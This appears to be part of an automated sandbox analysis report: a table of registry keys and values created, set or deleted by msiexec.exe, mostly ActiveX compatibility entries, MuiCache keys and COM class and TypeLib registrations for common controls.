Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F6DB041E-66D0-48BC-8797-57C24F5C801C}\AlternateCLSID = "{62B025F5-F551-44A9-8BA8-0118EFB9127C}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CDE57A43-8B86-11D0-B3C6-00A0C90AEA82} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{8C344712-5FEC-11CF-A0BF-00AA0062BE57}\AlternateCLSID = "{661CCA78-51EC-4066-8F34-BA50B142738E}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5054EC7-B9CB-4ad5-9F95-D8171A6D6BFA}\CLSID = "{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{642AC766-AAB4-11D0-8494-00A0C90DC8A9}\AlternateCLSID = "{A7F31C6B-5300-47C8-A642-5AC673794C92}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{95F0B3BE-E8AC-4995-9DCA-419849E06410} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{979127D3-7D01-4FDE-AF65-A698091468AF}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F0D2F219-CCB0-11D0-A316-00AA00688B10}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5054EC7-B9CB-4ad5-9F95-D8171A6D6BFA} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{39977C62-C383-463D-AF61-C71220634656}\AlternateCLSID = "{6E5311A1-325D-4FFD-9AF4-B373F02AE458}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{21D93913-CB0F-11D0-84AC-00A0C90DC8A9} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{0ECD9B64-23AA-11D0-B351-00A0C9055D8E}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3A2B370C-BA0A-11D1-B137-0000F8753F5D} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{99FF4677-FFC3-11D0-BD02-00C04FC2FB86} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{603C7E80-87C2-11D1-8BE3-0000F8754DA1}\AlternateCLSID = "{CEDFFAFD-3C2F-4552-9FD3-3DC4299057FD}" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{66833FE6-8583-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{39977C62-C383-463D-AF61-C71220634656} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2C247F23-8591-11D1-B16A-00C0F0283628}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{27395F85-0C0C-101B-A3C9-08002B2F49FB}\AlternateCLSID = "{AFB66F3E-7A33-41E9-A4F7-FE87B64F5555}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{02A69B00-081B-101B-8933-08002B2F4F5A}\AlternateCLSID = "{E304B70C-0FCE-4E1B-9C81-CDAAD9F7DA55}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F9043C85-F6F2-101A-A3C9-08002B2F49FB} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FAEEE760-117E-101B-8933-08002B2F4F5A} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F0D2F21C-CCB0-11D0-A316-00AA00688B10}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{27395F85-0C0C-101B-A3C9-08002B2F49FB} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{648A5600-2C6E-101B-82B6-000000000014}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{21D93913-CB0F-11D0-84AC-00A0C90DC8A9}\AlternateCLSID = "{018BCA43-2122-4211-9589-458B6A6E2A63}" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{00028C00-0000-0000-0000-000000000046}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{3A2B370C-BA0A-11D1-B137-0000F8753F5D}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{24B224E0-9545-4A2F-ABD5-86AA8A849385} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6FBA474B-43AC-11CE-9A0E-00AA0062BB4C} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6FBA474B-43AC-11CE-9A0E-00AA0062BB4C}\AlternateCLSID = "{D88A442E-9C85-48E3-A6F8-EF61C93989A0}" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{21D93913-CB0F-11D0-84AC-00A0C90DC8A9}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{20C62CAB-15DA-101B-B9A8-444553540000}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{026371C0-1B7C-11CF-9D53-00AA003C9CB6}\AlternateCLSID = "{2BEC8FA8-1193-4A15-B8AF-C6DF6E6930C7}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\AlternateCLSID = "{2B577565-36F7-4351-B2E7-DAFC75E9D72A}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{648A5600-2C6E-101B-82B6-000000000014} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{248DD896-BB45-11CF-9ABC-0080C7E7B78D} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{1E216240-1B7D-11CF-9D53-00AA003C9CB6}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BDD1F04B-858B-11D1-B16A-00C0F0283628} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E} C:\Windows\system32\msiexec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\44 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\44 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\34 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\35 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\37 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\41 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\41 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\43 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\45 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\36 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\45 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\46 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\4c C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\4A C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3f C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\4d C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\30 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\38 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\39 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3e C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\39 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3c C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\40 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\34 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\47 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\43 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\48 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\4C C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\35 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\4a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\4e C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\37 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\40 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3D C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\3E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\42 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\42 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\4D C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133618550694517625" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\31 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\49 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\49 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\4b C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3d C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\48 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\33 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\33 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\38 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\47 C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CEDFFAFD-3C2F-4552-9FD3-3DC4299057FD}\TypeLib\ = "{86CF1D34-0C5F-11D2-A9FC-0000F8754DA1}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CFA7636D-CAA1-4F18-868F-8720624C8B86}\ProgID\ = "MSComCtl2.FlatScrollBar.2" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D6F004C5-DC12-4B65-8730-2E95AD459F10}\ProgID C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3A08E130-8F65-11D0-9484-00A0C91110ED}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{27395F88-0C0C-101B-A3C9-08002B2F49FB}\1.1\HELPDIR\ = "C:\\Windows\\SysWOW64\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{AAB9C2AA-6036-4AE1-A41C-A40AB7F39520}\a.0 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{612A8626-0FB3-11CE-8747-524153480004}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.SBarCtrl\CLSID\ = "{8E3867A3-8586-11D1-B16A-00C0F0283628}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B0CC5081-BE92-11D1-8D11-0000F8756A3E}\TypeLib\ = "{198887E2-AC76-11D0-A77C-00A024A55AB0}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{27395F87-0C0C-101B-A3C9-08002B2F49FB}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global\Microsoft.VisualStudio.Tools.Applications.Hosting.v10.0,version="10.0.0.0",publicKeyToken="b03f5f7f11d50a3a",processorArchitecture="MSIL",fileVersion="10.0.60917.0",culture="neutral" = 440048004b00330047007a00760063003800340058006d005b0052005a003100430065004c00680056005300540041005f00520075006e00740069006d0065005f0043004c005200330035003e006200570031007d0048002c003300520065003800210045004f00590042007b0043002d005200430000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{612685EF-57C8-469F-88AB-E4E0B595C5AB}\MiscStatus C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{275DBBA0-805A-11CF-91F7-C2863C385E30} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{43478D71-78E0-11CF-8E78-00A0D100038E}\TypeLib C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62B025F5-F551-44A9-8BA8-0118EFB9127C}\MiscStatus\ = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDE57A44-8B86-11D0-B3C6-00A0C90AEA82} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{F0D2F21C-CCB0-11D0-A316-00AA00688B10}\Control C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{80B51087-CE4C-4FAE-8401-B6B3809DD234}\VersionIndependentProgID C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{BDC217C7-ED16-11CD-956C-0000C04E4C0A}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{703EAF2B-FD9F-41BC-BB81-6C6757A46E5E}\MiscStatus\1\ = "131473" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{27F8FFB1-7406-11D1-B18C-00A0C922E820}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{B09DE715-87C1-11D1-8BE3-0000F8754DA1}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComCtl2.UpDown C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{78E5A540-1850-11CF-9D53-00AA003C9CB6} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E71F04C-551F-11CF-8152-00AA00A40C25}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6D835690-900B-11D0-9484-00A0C91110ED} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{78E93844-85FD-11D0-8487-00A0C90DC8A9}\TypeLib\Version = "1.0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{74DD2713-BA98-4D10-A16E-270BBEB9B555}\MiscStatus\1\ = "131473" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\MiscStatus\1\ = "131473" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{1E216240-1B7D-11CF-9D53-00AA003C9CB6}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{90290CCC-F27D-11D0-8031-00C04FB6C701}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{E6E17E8A-DF38-11CF-8E74-00A0C90F26F8}\ProxyStubClsid C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83601-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.5" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9E074CF-BA0A-11D1-B137-0000F8753F5D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F24-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{C1A8AF25-1257-101B-8FB0-0020AF039CA3}\Version C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{0ECD9B64-23AA-11D0-B351-00A0C9055D8E}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{198887E4-AC76-11D0-A77C-00A024A55AB0}\TypeLib\ = "{198887E2-AC76-11D0-A77C-00A024A55AB0}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99FF4676-FFC3-11D0-BD02-00C04FC2FB86}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{64654B35-A024-4807-89D3-C6FDB5A260C7}\Control C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{612A8624-0FB3-11CE-8747-524153480004}\MiscStatus\1 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35053A20-8589-11D1-B16A-00C0F0283628}\ = "IProgressBar" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{EC04D82C-AA59-4ba4-96B1-27BE3FF05E00}\VersionIndependentProgID C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{48E59293-9880-11CF-9754-00AA00C00908} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CAB97084-FC6C-11D0-805D-00C04FB6C701}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\DESIGNER\\mshtmpgr.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{E404CD92-E7B8-4037-918D-5A18CFD09ED3}\ProgID C:\Windows\system32\msiexec.exe N/A
